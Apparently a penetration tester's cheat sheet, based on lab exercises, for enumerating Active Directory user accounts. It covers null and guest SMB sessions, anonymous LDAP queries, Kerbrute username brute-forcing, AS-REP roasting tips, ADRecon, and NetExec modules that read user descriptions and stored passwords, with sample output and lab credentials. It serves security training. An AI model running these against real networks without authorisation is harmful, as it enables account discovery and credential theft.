Users Identification

Guest and null session

SMB (445, 139) / RPC

Null Session

$ enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

administrator
guest
krbtgt
lab_adm
htb-student
<SNIP>

$ rpcclient -U "" -N 172.16.5.5

rpcclient $> enumdomusers 

crackmapexec smb 172.16.5.5 -u '' -p '' --users
nxc smb 10.10.11.35 -u '' -p '' --shares

Find user list, then try ASREPROAST, no credentials needed - getNPUsers.py

Guest session

nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute
# Create a user list
nxc smb 10.10.118.214 -u 'guest' -p '' --rid-brute | grep '(SidTypeUser)' | awk '{print $6}' | sed 's/DOMAIN\\//'


nxc smb 10.10.11.35 -u 'guest' -p '' --shares

Wordlist

GitHub - insidetrust/statistically-likely-usernames: Wordlists for creating statistically likely username lists for use in password attacks and security testingGitHub

jsmith.txt and a lot of usefull username list like service-accounts.txt test-accounts or top-formats.txt

Username lists

SecLists/Usernames/xato-net-10-million-usernames.txt at master · danielmiessler/SecListsGitHub

From Linkedin

GitHub - initstring/linkedin2username: OSINT Tool: Generate username lists for companies on LinkedInGitHub

Social Media

MS-NRPC

Enumerate Domain Users Without Authentication

GitHub - sud0Ru/NauthNRPC: Enumerate Domain Users Without AuthenticationGitHub

LDAP

Nom Nom

Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP)

GitHub - lkarlslund/ldapnomnom: Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP)GitHub

Anon

$ ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

guest
ACADEMY-EA-DC01$
ACAD

Description field

# ldapsearch -H ldap://baby.vl -x -b "DC=baby,DC=vl" | fgrep desc

$ ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users
[+]	Found 2906 users: 

cn: Guest

cn: Htb Student
userPrincipalName: htb-student@inlanefreight.local

Find user list, then try ASREPROAST, no credentials needed - getNPUsers.py

NXC

nxc ldap 192.168.1.48 -u "user.txt" -p '' -k

Kerbrute

Precompiled release:

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users

$ vim valid_ad_users.txt
$ awk '{print $NF}' valid_ad_users.txt >> ad_users.txt

kerbrute doesn't always find asreproastable accounts. Always try getNPusers.py to find asreproastable accounts (doesn't require credentials, just a list of users).

Misconfiguration

LLMNR NBT-NS Poisoning

LLMNR NBT-NS Poisoning

Authent

sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users

$ sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users > users.txt
$ cat users.txt | awk '{ print $5 }' | cut -d '\' -f2 > final_users.txt

Windows

PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt

Or With GUI: Properties -> Security -> Advanced -> Effective Access -> Select a User -> Advanced -> Object Types then "Find Now"

Columns to Add Descriptions

ADrecon

.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser

PS C:\htb> .\ADRecon.ps1

[*] ADRecon v1.1 by Prashant Mahajan (@prashant3535)
[*] Running on INLANEFREIGHT.LOCAL\MS01 - Member Server
[*] Commencing - 03/28/2022 09:24:58
[-] Domain
[-] Forest
[-] Trusts
[-] Sites
[-] Subnets
[-] SchemaHistory - May take some time
[-] Default Password Policy
[-] Fine Grained Password Policy - May need a Privileged Account
[-] Domain Controllers
[-] Users and SPNs - May take some time
[-] PasswordAttributes - Experimental
[-] Groups and Membership Changes - May take some time
[-] Group Memberships - May take some time
[-] OrganizationalUnits (OUs)
[-] GPOs
[-] gPLinks - Scope of Management (SOM)
[-] DNS Zones and Records
[-] Printers
[-] Computers and SPNs - May take some time
[-] LAPS - Needs Privileged Account
[-] BitLocker Recovery Keys - Needs Privileged Account
[-] GPOReport - May take some time
[*] Total Execution Time (mins): 11.05
[*] Output Directory: C:\Tools\ADRecon-Report-20220328092458

NXC

nxc ldap 192.168.1.48 -u raj -p Password@1 –-users

# Active users

nxc ldap 192.168.1.48 -u raj -p Password@1 --active-users

# Domain admins

nxc ldap 192.168.1.48 -u raj -p Password@1 --admin-count

# Users description

nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

# Get Users Password

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-unixUserPassword

Enumerate all user sessions on a host with normal User privileges

As long as the remote registry is running

--reg-sessions